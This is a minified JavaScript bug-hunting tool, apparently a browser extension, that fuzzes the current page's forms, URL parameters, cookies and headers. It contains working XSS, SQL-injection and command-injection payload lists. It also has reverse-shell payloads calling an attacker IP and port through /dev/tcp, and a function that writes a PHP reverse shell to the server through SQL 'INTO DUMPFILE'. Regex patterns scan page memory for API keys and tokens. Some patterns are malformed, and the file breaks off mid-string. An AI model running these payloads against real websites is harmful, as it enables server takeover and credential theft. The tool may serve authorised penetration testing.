jsBugHuntingHelper.min.js
function JsBugHuntingHelper(){"use strict";this.xssScanEnabled=!1,this.sqlInjectionScanEnabled=!1,this.rceScanEnabled=!1,this.formFuzzingEnabled=!1,this.originalWinObj={},this.attackerIp="",this.attackerPort="",this.customCookie="",this.customHeaders="",this.cookiesFuzzerEnabled=!1,this.headersFuzzerEnabled=!1;const previousXssAction="null",payloadsXSS=[{type:"XSS",previousAction:"null",payloadString:'<script>alert("XSS_VULNERABLE_PARAM")<\/script>',expectedResult:"data.indexOf('<script>alert(\"XSS_VULNERABLE_PARAM\")<\/script>') !== -1 && data.indexOf('Uncaught mysqli') === -1"},{type:"XSS",previousAction:"null",payloadString:'"><script>alert("XSS_VULNERABLE_PARAM")<\/script><div class="',expectedResult:"data.indexOf('<script>alert(\"XSS_VULNERABLE_PARAM\")<\/script>') !== -1 && data.indexOf('Uncaught mysqli') === -1"},{type:"XSS",previousAction:"null",payloadString:'<svg/onload=alert("XSS_VULNERABLE_PARAM")>',expectedResult:"data.indexOf('<svg/onload=alert(\"XSS_VULNERABLE_PARAM\")>') !== -1 && data.indexOf('Uncaught mysqli') === -1"}],previousErrorBasedSqliAction="null",errorBasedSqliResult="data.indexOf('Uncaught mysql') !== -1",payloadsSQLi=[{type:"SQL Injection",previousAction:"null",payloadString:'"',expectedResult:errorBasedSqliResult},{type:"SQL Injection",previousAction:"null",payloadString:"'",expectedResult:errorBasedSqliResult},{type:"SQL Injection",previousAction:"null",payloadString:"concat(9182,73645)",expectedResult:"data.indexOf('918273645') !== -1"}],unionSelectSQLiResult="data.indexOf('918273645') !== -1 && data.indexOf('union select') === -1",eof=["","--","#"],sqliQuery=[];sqliQuery[0]={originalQuery:"' union select '918273645",addend:"','918273645",finalQuote:["","'"]},sqliQuery[1]={originalQuery:'" union select "918273645',addend:'","918273645',finalQuote:["",'"']},sqliQuery[2]={originalQuery:"0 union select 918273645",addend:",918273645",finalQuote:[""]};for(let q=0;q<sqliQuery.length;q++){let payload=sqliQuery[q].originalQuery;for(let 
i=0;i<11;i++){i>0&&(payload+=sqliQuery[q].addend);for(let fq=0;fq<sqliQuery[q].finalQuote.length;fq++){const payloadWithQuotes=payload+sqliQuery[q].finalQuote[fq];for(let e=0;e<eof.length;e++){const payloadWithQuotesEof=payloadWithQuotes+eof[e];payloadsSQLi.push({type:"SQL Injection",previousAction:"null",payloadString:payloadWithQuotesEof,expectedResult:unionSelectSQLiResult})}}}}const previousRceAction="data = data.replaceAll('echo%2BTEST_RCE','').replaceAll('echo+TEST_RCE','').replaceAll('echo TEST_RCE','').replaceAll('testRCE.php','').replaceAll(\"'TEST_RCE'\",'')",genericRceResult="data.indexOf('TEST_RCE') !== -1 && data.indexOf('Uncaught mysqli') === -1",payloadsRCE=[{type:"RCE",previousAction:previousRceAction,payloadString:'test" || echo TEST_RCE > /var/www/html/testRCE.php && cat /var/www/html/testRCE.php || "',expectedResult:genericRceResult},{type:"RCE",previousAction:previousRceAction,payloadString:'test" || echo TEST_RCE > /var/www/testRCE.php && cat /var/www/testRCE.php || "',expectedResult:genericRceResult},{type:"RCE",previousAction:previousRceAction,payloadString:'"+%26%26+echo+TEST_RCE+%26%26+"',expectedResult:genericRceResult},{type:"RCE",previousAction:previousRceAction,payloadString:'" && echo TEST_RCE && "',expectedResult:genericRceResult},{type:"RCE",previousAction:previousRceAction,payloadString:"echo TEST_RCE",expectedResult:genericRceResult},{type:"RCE",previousAction:previousRceAction,payloadString:'1" && echo TEST_RCE #',expectedResult:genericRceResult},{type:"RCE",previousAction:previousRceAction,payloadString:'" || echo TEST_RCE ||',expectedResult:genericRceResult},{type:"RCE",previousAction:previousRceAction,payloadString:"1\" || /bin/bash -c 'bash -i >& /dev/tcp/[ATTACKERIP]/[ATTACKERPORT] 0>&1' #",expectedResult:genericRceResult},{type:"RCE",previousAction:previousRceAction,payloadString:'1" && echo ^<?php > file2.php && echo $cmd=^"bash.exe -c \\"bash.exe -i >& /dev/tcp/[ATTACKERIP]/[ATTACKERPORT] 0>&1\\"^"; >> file2.php && echo 
exec($cmd); >> file2.php && echo ?^> >> file2.php && php file2.php #',expectedResult:genericRceResult}],searchElements=[new SearchElement("form","string","<form"),new SearchElement("url","string","http://"),new SearchElement("url","string","https://"),new SearchElement("web socket","string","ws://"),new SearchElement("web socket","string","wss://"),new SearchElement("post request","string",'"POST"'),new SearchElement("get request","string",'"GET"'),new SearchElement("post request","string","'POST"),new SearchElement("get request","string","'GET'"),new SearchElement("ajax request","string",".ajax"),new SearchElement("post request","string","$.post"),new SearchElement("get request","string","$.get"),new SearchElement("query","string","query"),new SearchElement("api call","string","/api"),new SearchElement("php file","string",".php"),new SearchElement("asp file","string",".asp"),new SearchElement("json file","string",".json"),new SearchElement("mailto protocol","string","mailto:"),new SearchElement("something on mysql","string","mysql"),new SearchElement("something on email","string",'"email"'),new SearchElement("something on username","string",'"username"'),new SearchElement("something on username","string",'"user"'),new SearchElement("something on password","string",'"password"'),new SearchElement("something on password","string",'"pass"'),new SearchElement("something on password","string",'"psw"'),new SearchElement("something on password","string",'"pwd"'),new SearchElement("REGEX url with params","regEx",/\?(\w+=\w+)/),new SearchElement("REGEX email address","regEx",/\S+@\S+\.\S+/),new SearchElement("Twitter Access Token","regEx",/[1-9][ 0-9]+-[0-9a-zA-Z]{40}/),new SearchElement("Twitter Username","regEx",/(^|[^@\w])@(\w{1,15})\b/),new SearchElement("FB Access Token","regEx",/EAACEdEose0cBA[0-9A-Za-z]+/),new SearchElement("FB OAuth 2.0","regEx",/[A-Za-z0-9]{125}/),new SearchElement("Google API Key","regEx",/AIza[0-9A-Za-z-_]{35}/),new SearchElement("Google OAuth 
2.0 Auth Code","regEx",/4\/[0-9A-Za-z-_]+/),new SearchElement("Google OAuth 2.0 Refresh Token","regEx",/1\/[0-9A-Za-z-]{43}|1\/[0-9A-Za-z-]{64}/),new SearchElement("Google OAuth 2.0 Access Token","regEx",/ya29.[0-9A-Za-z-_]+/),new SearchElement("Github OAuth 2.0 ID","regEx",/[A-Za-z0-9_]{255}/),new SearchElement("Picatic API Key","regEx",/sk_live_[0-9a-z]{32}/),new SearchElement("Stripe API Key","regEx",/sk_live_[0-9a-zA-Z]{24}/),new SearchElement("Square Access Token","regEx",/sqOatp-[0-9A-Za-z-_]{22}/),new SearchElement("Square OAuth Secret","regEx",/q0csp-[ 0-9A-Za-z-_]{43}/),new SearchElement("Paypal/Braintree Access Token","regEx",/\$[0-9a-z]{161[0-9a,]{32}/),new SearchElement("AWS Auth Token","regEx",/amzn.mws.[0-9a-f]{8}-[0-9a-f]{4}-10-9a-f1{4}-[0-9a,]{4}-[0-9a-f]{12}/),new SearchElement("Twilio API Key","regEx",/55[0-9a-fA-F]{32}/),new SearchElement("MailGun API Key","regEx",/key-[0-9a-zA-Z]{32}/),new SearchElement("MailChimp API Key","regEx",/[0-9a-f]{32}-us[0-9]{1,2}/),new SearchElement("Slack OAuth 2.0","regEx",/xoxb-[0-9]{11}-[0-9]{11}-[0-9a-zA-Z]{24}/),new SearchElement("Slack OAuth v2 Configuration Token","regEx",/xoxe.xoxp-1-[0-9a-zA-Z]{166}/),new SearchElement("Slack OAuth v2 Refresh Token","regEx",/xoxe-1-[0-9a-zA-Z]{147}/),new SearchElement("Slack Webhook","regEx",/T[a-zA-Z0-9_]{8}\/B[a-zA-Z0-9_]{8}\/[a-zA-Z0-9_]{24}/),new SearchElement("AWS Access Key ID","regEx",/AKIA[0-9A-Z]{16}/),new SearchElement("Google Cloud OAuth 2.0","regEx",/[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}/),new SearchElement("Google Clous API Key","regEx",/[A-Za-z0-9_]{21}--[A-Za-z0-9_]{8}/),new SearchElement("Heroku API Key","regEx",/[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}/),new SearchElement("Heroku OAuth 2.0","regEx",/[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}/),new SearchElement("Js One Line Comment","string","//"),new SearchElement("Js Multi Line Comment","string","/*")];function tryRemoteShellLink(v){return"SQL 
Injection"===v.payloadType&&-1!==v.paramValue.toLowerCase().indexOf("union")?"<a href=\"javascript:trySqliRemoteShell('"+btoa(JSON.stringify(v))+"')\">Try</a>":""}async function trySqliRemoteShell(base64v){const attackerIp=$("#attackerIp").val(),attackerPort=$("#attackerPort").val();if(""===attackerIp||""===attackerPort)return alert("Please insert your attacker ip and port"),!1;const fileName=(new Date).getTime()+".php",payloads=[{filePlace:"c:/var/www/"+fileName,payload:'<?php exec("bash.exe -c \\"bash.exe -i >& /dev/tcp/'+attackerIp+"/"+attackerPort+' 0>&1\\"");?>'},{filePlace:"/var/www/"+fileName,payload:"<?php exec(\"/bin/bash -c 'bash -i >& /dev/tcp/"+attackerIp+"/"+attackerPort+" 0>&1'\");?>"},{filePlace:"/var/www/html/"+fileName,payload:"<?php exec(\"/bin/bash -c 'bash -i >& /dev/tcp/"+attackerIp+"/"+attackerPort+" 0>&1'\");?>"}];alert("Run netcat -lvnp PORT (or ncat -lvnp PORT in windows) on your computer");const initialPayload=JSON.parse(atob(base64v));for(const pl of payloads){const stringPayload=pl.payload,hexPayload=stringPayload.hexEncode();let newPayload="";-1!==initialPayload.paramValue.indexOf('"918273645"')?newPayload=initialPayload.paramValue.replaceLast('"918273645',"0x"+hexPayload+" INTO DUMPFILE '"+pl.filePlace+"' #"):-1!==initialPayload.paramValue.indexOf("'918273645'")?newPayload=initialPayload.paramValue.replaceLast("'918273645","0x"+hexPayload+" INTO DUMPFILE '"+pl.filePlace+"' #"):-1!==initialPayload.paramValue.indexOf("918273645")&&(newPayload=initialPayload.paramValue.replaceLast("918273645","0x"+hexPayload+" INTO DUMPFILE '"+pl.filePlace+"' #")),console.log("initialPayload",newPayload);const name=initialPayload.paramName,value=newPayload;let tempParams=[];$("form").each((i,form)=>{$(form).find("input,button,select,textarea").each((i2,v2)=>{if(void 0!==$(v2).attr("name")&&"undefined"!==$(v2).attr("name")&&""!==$(v2).attr("name")){const tagName=$(v2)[0].tagName;let 
value="";if("SELECT"===tagName)value=$(v2).find("option:selected").val();else if("INPUT"===tagName){const type=$(v2).attr("type").toLowerCase();value="checkbox"===type||"radio"===type?$(v2).prop("checked").toString():$(v2).val()}tempParams.push([$(v2).attr("name"),value])}})}),tempParams=tempParams.filter((v,i)=>v[0]!==name),tempParams.push([name,value]),await $.ajax(initialPayload.url,{type:initialPayload.httpMethod,data:Object.fromEntries(tempParams)}).done(data=>{$.get(window.location.origin+"/"+fileName).done(()=>{})})}}function cookieToTouple(){return document.cookie.split(";").map(v=>v.split("="))}function headersToTouple(headers){let headersObj={};try{headersObj=JSON.parse(headers)}catch(e){console.log(e)}return Object.entries(headersObj)}function guiEnabled(gui){$("#guiModal #accordionExample").html(gui),document.getElementById("openGuiButton").disabled=!1,document.getElementById("openGuiButton").innerHTML="OPEN GUI"}function htmlEntities(str){return String(str).replace(/&/g,"&").replace(/</g,"<").replace(/>/g,">").replace(/"/g,""")}function getAllUrlParams(url){let queryString=url?url.split("?")[1]:window.location.search.slice(1);const obj={};if(queryString){queryString=queryString.split("#")[0];const arr=queryString.split("&");for(let i=0;i<arr.length;i++){const a=arr[i].split("="),paramName=a[0],paramValue=void 0===a[1]||a[1];if(paramName.match(/\[(\d+)?\]$/)){const key=paramName.replace(/\[(\d+)?\]/,"");if(obj[key]||(obj[key]=[]),paramName.match(/\[\d+\]$/)){const index=/\[(\d+)\]/.exec(paramName)[1];obj[key][index]=paramValue}else obj[key].push(paramValue)}else obj[paramName]?obj[paramName]&&"string"==typeof obj[paramName]?(obj[paramName]=[obj[paramName]],obj[paramName].push(paramValue)):obj[paramName].push(paramValue):obj[paramName]=paramValue}}return obj}function getjQueryEventHandlers(element,eventns){const $=this.originalWinObj.jQuery,i=(eventns||"").indexOf("."),event=i>-1?eventns.substr(0,i):eventns,namespace=i>-1?eventns.substr(i+1):void 
0,handlers=Object.create(null);if(!(element=$(element)).length)return handlers;const listeners=$._data(element.get(0),"events")||handlers,events=event?[event]:Object.keys(listeners);if(!eventns)return listeners;function getHandlers(e){const type=this.toString(),eNamespace=e.namespace||e.data&&e.data.handler;(event===type&&!namespace||eNamespace===namespace&&!event||eNamespace===namespace&&event===type)&&(handlers[type]=handlers[type]||[],handlers[type].push(e))}return events.forEach(type=>{(listeners[type]||[]).forEach(getHandlers,type)}),handlers}function searchJqueryListeners(){const jQueryListeners=[];return $("*").each((i,v)=>{const elementListeners=getjQueryEventHandlers.call(this,v);Object.keys(elementListeners).length>0&&jQueryListeners.push(elementListeners)}),recursiveEnumerate(jQueryListeners,0)}function listAllEventListeners(){const allElements=Array.prototype.slice.call(document.querySelectorAll("*"));allElements.push(document),allElements.push(this.originalWinObj);const types=[];for(const ev in this.originalWinObj)/^on/.test(ev)&&(types[types.length]=ev);const elements=[];for(let i=0;i<allElements.length;i++){const currentElement=allElements[i];for(let j=0;j<types.length;j++)"function"==typeof currentElement[types[j]]&&elements.push(currentElement[types[j]])}return elements}function regEx(string,regEx){const index=[],regex1=RegExp(regEx,"gim"),str1=string;let array1=[];for(;null!==(array1=regex1.exec(str1));)index.push(array1.index);return index}function getAllIndexes(arr,val){const indexes=[];let i=-1;for(;-1!==(i=arr.indexOf(val,i+1));)indexes.push(i);return indexes}function searchInside(functionToString,object,objKeys,o,resultTmp){let result=[];if(void 0!==resultTmp&&(result=resultTmp),void 0===objKeys[o]&&(objKeys[o]=""),void 0===object[objKeys[o]]&&(object[objKeys[o]]=""),searchElements.forEach(v=>{if("string"===v.type){const 
index=getAllIndexes(functionToString,v.string);index.forEach(ind=>{result.push({description:v.description,name:objKeys[o],function:object[objKeys[o]],declaration:functionToString.substr(ind-15,60)})})}else if("regEx"===v.type){const index=regEx(functionToString,v.string);index.forEach(ind=>{"string"!==objKeys[o]&&result.push({description:v.description,name:objKeys[o],function:object[objKeys[o]],declaration:functionToString.substr(ind-15,60)})})}}),void 0===resultTmp)return result}function recursiveEnumerate(object,level){function recursion(object,level){level++;const objKeys=Object.keys(object);for(let o=0;o<objKeys.length;o++)if(level<5&&null!==object[objKeys[o]]&&("function"==typeof object[objKeys[o]]||"object"==typeof object[objKeys[o]])&&"$"!==objKeys[o]&&"location"!==objKeys[o]&&"jQuery"!==objKeys[o]&&"JsBugHuntingHelper"!==objKeys[o]&&"recursion"!==objKeys[o]&&"recursiveEnumerate"!==objKeys[o]&&"alreadyProcessedFunctions"!==objKeys[o]&&"jsHuntingHelper"!==objKeys[o]&&"fn"!==objKeys[o])try{const functionToString=object[objKeys[o]].toString().replace(/(\r\n|\n|\r)/gm,"").replace(/\s\s+/g," ");-1===alreadyProcessedFunctions.indexOf(functionToString)&&(searchInside(functionToString,object,objKeys,o,result),-1===functionToString.indexOf("[object Object]")&&alreadyProcessedFunctions.push(functionToString),"set"!==objKeys[o]&&"push"!==objKeys[o]&&recursion(object[objKeys[o]],level))}catch(reason){console.log(reason)}}const result=[],alreadyProcessedFunctions=[];return recursion(object,level),result}async function getPageHeaders(url){return new Promise((resolve,reject)=>{const xhr=$.ajax({type:"GET",url:url,success:function(){resolve(xhr.getAllResponseHeaders())},error:function(){resolve(!1)}})})}function removeBootstrapDuplicatedStyles(classToRemove){if(void 0!==document.wrappedJSObject)try{$.each(document.styleSheets,(function(_,sheet){let keepGoing=!0;return $.each(sheet.cssRules||sheet.rules,(function(index,rule){if(rule.selectorText===classToRemove)return 
sheet.deleteRule(index),keepGoing=!1,keepGoing})),keepGoing}))}catch(e){}}async function testCookies(){const result=[],paramsEntities=Object.entries(getAllUrlParams(document.location.href));for(const payload of payloadsXSS.concat(payloadsSQLi).concat(payloadsRCE))if(!0===this.xssScanEnabled&&"XSS"===payload.type||!0===this.sqlInjectionScanEnabled&&"SQL Injection"===payload.type||!0===this.rceScanEnabled&&"RCE"===payload.type){const url=document.location.origin+document.location.pathname,r=await new Payload(url,"cookiesParams","GET",paramsEntities,payload.previousAction,payload.payloadString.replace("[ATTACKERIP]",this.attackerIp).replace("[ATTACKERPORT]",this.attackerPort),payload.expectedResult,payload.type,headersToTouple(this.customHeaders),cookieToTouple()).isValidResponse();!1!==r&&result.push(r)}return result}async function testHeaders(){const result=[],paramsEntities=Object.entries(getAllUrlParams(document.location.href));for(const payload of payloadsXSS.concat(payloadsSQLi).concat(payloadsRCE))if(!0===this.xssScanEnabled&&"XSS"===payload.type||!0===this.sqlInjectionScanEnabled&&"SQL Injection"===payload.type||!0===this.rceScanEnabled&&"RCE"===payload.type){const url=document.location.origin+document.location.pathname,r=await new Payload(url,"headersParams","GET",paramsEntities,payload.previousAction,payload.payloadString.replace("[ATTACKERIP]",this.attackerIp).replace("[ATTACKERPORT]",this.attackerPort),payload.expectedResult,payload.type,headersToTouple(this.customHeaders),cookieToTouple()).isValidResponse();!1!==r&&result.push(r)}return result}async function testXSS(){const result=[],paramsEntitiesTemp=Object.entries(getAllUrlParams(document.location.href));for(let i=0;i<paramsEntitiesTemp.length;i++)for(const payload of payloadsXSS){const paramsEntities=Object.entries(getAllUrlParams(document.location.href)),newUrl2=document.location.origin+document.location.pathname,r=await new 
Payload(newUrl2,"pageParams","GET",paramsEntities,payload.previousAction,payload.payloadString.replace("[ATTACKERIP]",this.attackerIp).replace("[ATTACKERPORT]",this.attackerPort),payload.expectedResult,"XSS",headersToTouple(this.customHeaders),{}).isValidResponse();!1!==r&&result.push(r)}return result}async function testSqlInjection(){const result=[],paramsEntitiesTemp=Object.entries(getAllUrlParams(document.location.href));for(let i=0;i<paramsEntitiesTemp.length;i++)for(const payload of payloadsSQLi){const paramsEntities=Object.entries(getAllUrlParams(document.location.href)),newUrl2=document.location.origin+document.location.pathname,r=await new Payload(newUrl2,"pageParams","GET",paramsEntities,payload.previousAction,payload.payloadString.replace("[ATTACKERIP]",this.attackerIp).replace("[ATTACKERPORT]",this.attackerPort),payload.expectedResult,"SQL Injection",headersToTouple(this.customHeaders),{}).isValidResponse();!1!==r&&result.push(r)}return result}async function testRCE(){const result=[],paramsEntitiesTemp=Object.entries(getAllUrlParams(document.location.href));for(let i=0;i<paramsEntitiesTemp.length;i++)for(const payload of payloadsRCE){const paramsEntities=Object.entries(getAllUrlParams(document.location.href)),newUrl2=document.location.origin+document.location.pathname,r=await new Payload(newUrl2,"pageParams","GET",paramsEntities,payload.previousAction,payload.payloadString.replace("[ATTACKERIP]",this.attackerIp).replace("[ATTACKERPORT]",this.attackerPort),payload.expectedResult,"RCE",headersToTouple(this.customHeaders),{}).isValidResponse();!1!==r&&result.push(r)}return result}function Q(root,selector){return"string"==typeof root&&(selector=root,root=document),root.querySelectorAll(selector)}async function formLoop(){let result=[];for(const form of Q("form")){const originalParamsLength=$(form).find("input,button,select,textarea").length;let url=$(form).attr("action");if(void 0===url||""===url)url=this.originalWinObj.location.href;else 
if("http"!==url.substr(0,4)){let b=this.originalWinObj.location.href.split("/").slice(0,-1).join("/");"/"!==url[0]&&(b+="/"),url=b+url}let method="GET";"POST"!==$(form).attr("method")&&"post"!==$(form).attr("method")&&"$_POST"!==$(form).attr("method")&&"$_post"!==$(form).attr("method")||(method="POST");const tempParams=[];$(form).find("input,button,select,textarea").each((i2,v2)=>{if(void 0!==$(v2).attr("name")&&"undefined"!==$(v2).attr("name")&&""!==$(v2).attr("name")){const tagName=$(v2)[0].tagName;let value="";if("SELECT"===tagName)value=$(v2).find("option:selected").val();else if("INPUT"===tagName){const type=$(v2).attr("type").toLowerCase();value="checkbox"===type||"radio"===type?$(v2).prop("checked").toString():$(v2).val()}tempParams.push([$(v2).attr("name"),value])}});const paramsEntities=tempParams;result=result.concat(await fuzzer.call(this,originalParamsLength,url,"pageParams",method,paramsEntities)),!0===this.cookiesFuzzerEnabled&&(result=result.concat(await fuzzer.call(this,originalParamsLength,url,"cookiesParams",method,paramsEntities))),!0===this.headersFuzzerEnabled&&(result=result.concat(await fuzzer.call(this,originalParamsLength,url,"headersParams",method,paramsEntities)))}return result.filter(v=>void 0!==v.paramName)}async function fuzzer(originalParamsLength,url,type,method,paramsEntities){const result=[];for(let i=0;i<originalParamsLength;i++)for(const payload of payloadsXSS.concat(payloadsSQLi).concat(payloadsRCE))if(!0===this.xssScanEnabled&&"XSS"===payload.type||!0===this.sqlInjectionScanEnabled&&"SQL Injection"===payload.type||!0===this.rceScanEnabled&&"RCE"===payload.type){const r=await new Payload(url,type,method,paramsEntities,payload.previousAction,payload.payloadString.replace("[ATTACKERIP]",this.attackerIp).replace("[ATTACKERPORT]",this.attackerPort),payload.expectedResult,payload.type,headersToTouple(this.customHeaders),cookieToTouple()).isValidResponse();!1!==r&&result.push(r)}return result}this.init=async 
function(xssScanEnabled,sqlInjectionScanEnabled,rceScanEnabled,formFuzzingEnabled,attackerIp,attackerPort,customCookie,customHeaders,cookiesFuzzerEnabled,headersFuzzerEnabled){document.getElementById("openGuiButton").disabled=!0,document.getElementById("openGuiButton").innerHTML="Loading...",this.xssScanEnabled=xssScanEnabled,this.sqlInjectionScanEnabled=sqlInjectionScanEnabled,this.rceScanEnabled=rceScanEnabled,this.formFuzzingEnabled=formFuzzingEnabled,this.attackerIp=attackerIp,this.attackerPort=attackerPort,this.customHeaders="{}",this.cookiesFuzzerEnabled=cookiesFuzzerEnabled,this.headersFuzzerEnabled=headersFuzzerEnabled;try{""!==customHeaders.trim()&&(this.customHeaders=JSON.stringify(JSON.parse(customHeaders)))}catch(e){alert(e)}""!==customCookie.trim()&&(document.cookie=customCookie),void 0!==window.wrappedJSObject?this.originalWinObj=window.wrappedJSObject:this.originalWinObj=window,void 0!==window.wrappedJSObject&&(window.wrappedJSObject.Mapper=cloneInto(Mapper,window,{cloneFunctions:!0}),exportFunction(trySqliRemoteShell,window,{defineAs:"trySqliRemoteShell"})),removeBootstrapDuplicatedStyles(".fade"),removeBootstrapDuplicatedStyles(".collapse")},this.normalScan=async function(){let gui="",accordionNumber=0;if(console.log("Created by Davide Cavallini"),console.log("Linkedin: https://www.linkedin.com/in/davidecavallini/"),console.log("----------------------------------------------------------"),console.log("\n"),console.log("Body Source Suspicious Points".toUpperCase()),console.table(searchInside(document.body.innerHTML.replace(/(\r\n|\n|\r)/gm,"").replace(/\s\s+/g," "),document.body,["BODY"],0)),accordionNumber++,gui+='<div class="accordion-item"><h2 class="accordion-header" id="heading'+accordionNumber+'"> <button class="accordion-button" type="button" data-bs-toggle="collapse" data-bs-target="#collapse'+accordionNumber+'" aria-expanded="true" aria-controls="collapse'+accordionNumber+'">Body Source Suspicious Points</button> </h2><div 
id="collapse'+accordionNumber+'" class="accordion-collapse collapse" aria-labelledby="heading'+accordionNumber+'" data-bs-parent="#accordionExample"><div class="accordion-body">',gui+='<table class="table table-responsive table-hover">',gui+="<tr><th>Description</th><th>Declaration</th></tr>",searchInside(document.body.innerHTML.replace(/(\r\n|\n|\r)/gm,"").replace(/\s\s+/g," "),document.body,["BODY"],0).forEach(v=>{gui+="<tr><td>"+htmlEntities(v.description)+"</td><td><code>"+htmlEntities(v.declaration)+"</code></td></tr>"}),gui+="</table>",gui+="</div></div></div>",console.log("----------------------------------------------------------------------------"),console.log("\n"),console.log("Window Memory Suspicious Points".toUpperCase()),recursiveEnumerate(this.originalWinObj,0).forEach(v=>{console.log(v.description,v.function,v.declaration)}),accordionNumber++,gui+='<div class="accordion-item"><h2 class="accordion-header" id="heading'+accordionNumber+'"> <button class="accordion-button" type="button" data-bs-toggle="collapse" data-bs-target="#collapse'+accordionNumber+'" aria-expanded="true" aria-controls="collapse'+accordionNumber+'">Window Memory Suspicious Points</button> </h2><div id="collapse'+accordionNumber+'" class="accordion-collapse collapse" aria-labelledby="heading'+accordionNumber+'" data-bs-parent="#accordionExample"><div class="accordion-body">',gui+='<table class="table table-responsive table-hover">',gui+="<tr><th>Description</th><th>Function</th><th>Declaration</th><th>Mapper</th></tr>",recursiveEnumerate(this.originalWinObj,0).forEach(v=>{gui+="<tr><td>"+htmlEntities(v.description)+'</td><td><a href="javascript:console.log('+v.name+");alert('Look the Console')\">"+htmlEntities(v.name)+"</a></td><td><code>"+htmlEntities(v.declaration)+"</code></td><td><a href=\"javascript:Mapper('"+v.name+"');alert('Look the Console')\">Reverse 
Map</a></td></tr>"}),gui+="</table>",gui+="</div></div></div>",console.log("----------------------------------------------------------------------------"),console.log("\n"),console.log("JS Listeners Suspicious Points".toUpperCase()),recursiveEnumerate(listAllEventListeners.call(this),0).forEach(v=>{console.log(v.description,v.function,v.declaration)}),accordionNumber++,gui+='<div class="accordion-item"><h2 class="accordion-header" id="heading'+accordionNumber+'"> <button class="accordion-button" type="button" data-bs-toggle="collapse" data-bs-target="#collapse'+accordionNumber+'" aria-expanded="true" aria-controls="collapse'+accordionNumber+'">JS Listeners Suspicious Points</button> </h2><div id="collapse'+accordionNumber+'" class="accordion-collapse collapse" aria-labelledby="heading'+accordionNumber+'" data-bs-parent="#accordionExample"><div class="accordion-body">',gui+='<table class="table table-responsive table-hover">',gui+="<tr><th>Description</th><th>Function</th><th>Declaration</th></tr>",recursiveEnumerate(listAllEventListeners.call(this),0).forEach(v=>{gui+="<tr><td>"+htmlEntities(v.description)+"</td><td>"+htmlEntities(v.function.name)+"</td><td><code>"+htmlEntities(v.declaration)+"</code></td></tr>"}),gui+="</table>",gui+="</div></div></div>",console.log("----------------------------------------------------------------------------"),console.log("\n"),void 0!==window.wrappedJSObject.jQuery&&(console.log("JQuery Listeners Suspicious Points".toUpperCase()),searchJqueryListeners.call(this).forEach(v=>{console.log(v.description,v.function,v.declaration)}),accordionNumber++,gui+='<div class="accordion-item"><h2 class="accordion-header" id="heading'+accordionNumber+'"> <button class="accordion-button" type="button" data-bs-toggle="collapse" data-bs-target="#collapse'+accordionNumber+'" aria-expanded="true" aria-controls="collapse'+accordionNumber+'">JQuery Listeners Suspicious Points</button> </h2><div id="collapse'+accordionNumber+'" 
class="accordion-collapse collapse" aria-labelledby="heading'+accordionNumber+'" data-bs-parent="#accordionExample"><div class="accordion-body">',gui+='<table class="table table-responsive table-hover">',gui+="<tr><th>Description</th><th>Function</th><th>Declaration</th></tr>",searchJqueryListeners.call(this).forEach(v=>{gui+="<tr><td>"+htmlEntities(v.description)+"</td><td>"+htmlEntities(v.function.name)+"</td><td><code>"+htmlEntities(v.declaration)+"</code></td></tr>"}),gui+="</table>",gui+="</div></div></div>",console.log("----------------------------------------------------------------------------"),console.log("\n"),console.log("JQuery Document Listeners Suspicious Points".toUpperCase()),recursiveEnumerate(getjQueryEventHandlers.call(this,document),0).forEach(v=>{console.log(v.description,v.function,v.declaration)}),accordionNumber++,gui+='<div class="accordion-item"><h2 class="accordion-header" id="heading'+accordionNumber+'"> <button class="accordion-button" type="button" data-bs-toggle="collapse" data-bs-target="#collapse'+accordionNumber+'" aria-expanded="true" aria-controls="collapse'+accordionNumber+'">JQuery Document Listeners Suspicious Points</button> </h2><div id="collapse'+accordionNumber+'" class="accordion-collapse collapse" aria-labelledby="heading'+accordionNumber+'" data-bs-parent="#accordionExample"><div class="accordion-body">',gui+='<table class="table table-responsive table-hover">',gui+="<tr><th>Description</th><th>Function</th><th>Declaration</th></tr>",recursiveEnumerate(getjQueryEventHandlers.call(this,document),0).forEach(v=>{gui+="<tr><td>"+htmlEntities(v.description)+"</td><td>"+htmlEntities(v.name)+"</td><td><code>"+htmlEntities(v.declaration)+"</code></td></tr>"}),gui+="</table>",gui+="</div></div></div>",console.log("----------------------------------------------------------------------------"),console.log("\n")),console.log("Cookie".toUpperCase(),document.cookie),accordionNumber++,gui+='<div class="accordion-item"><h2 
class="accordion-header" id="heading'+accordionNumber+'"> <button class="accordion-button" type="button" data-bs-toggle="collapse" data-bs-target="#collapse'+accordionNumber+'" aria-expanded="true" aria-controls="collapse'+accordionNumber+'">Cookie</button> </h2><div id="collapse'+accordionNumber+'" class="accordion-collapse collapse" aria-labelledby="heading'+accordionNumber+'" data-bs-parent="#accordionExample"><div class="accordion-body">'+htmlEntities(document.cookie).replaceAll(";","<br>")+"</div></div></div>",!0===this.cookiesFuzzerEnabled){console.log("URL Cookies Vulnerabilities".toUpperCase());const cookies=await testCookies.call(this);console.log(cookies),accordionNumber++,gui+='<div class="accordion-item"><h2 class="accordion-header" id="heading'+accordionNumber+'"> <button class="accordion-button" type="button" data-bs-toggle="collapse" data-bs-target="#collapse'+accordionNumber+'" aria-expanded="true" aria-controls="collapse'+accordionNumber+'">URL Cookies Vulnerabilities</button> </h2><div id="collapse'+accordionNumber+'" class="accordion-collapse collapse" aria-labelledby="heading'+accordionNumber+'" data-bs-parent="#accordionExample"><div class="accordion-body">',gui+='<table class="table table-responsive table-hover">',gui+="<tr><th>Url</th><th>HttpMethod</th><th>ParamName</th><th>ParamValue</th><th>PayloadType</th><th>Remote Shell</th></tr>",cookies.forEach(v=>{gui+="<tr><td>"+htmlEntities(v.url)+"</td><td>"+htmlEntities(v.httpMethod)+"</td><td>"+htmlEntities(v.paramName)+"</td><td>"+htmlEntities(v.paramValue)+"</td><td>"+htmlEntities(v.payloadType)+"</td><td></td></tr>"}),gui+="</table>",gui+="</div></div></div>"}console.log("----------------------------------------------------------------------------"),console.log("\n");const headers=await getPageHeaders(document.location.href);if(console.log("Headers".toUpperCase(),headers),accordionNumber++,gui+='<div class="accordion-item"><h2 class="accordion-header" id="heading'+accordionNumber+'"> <button 
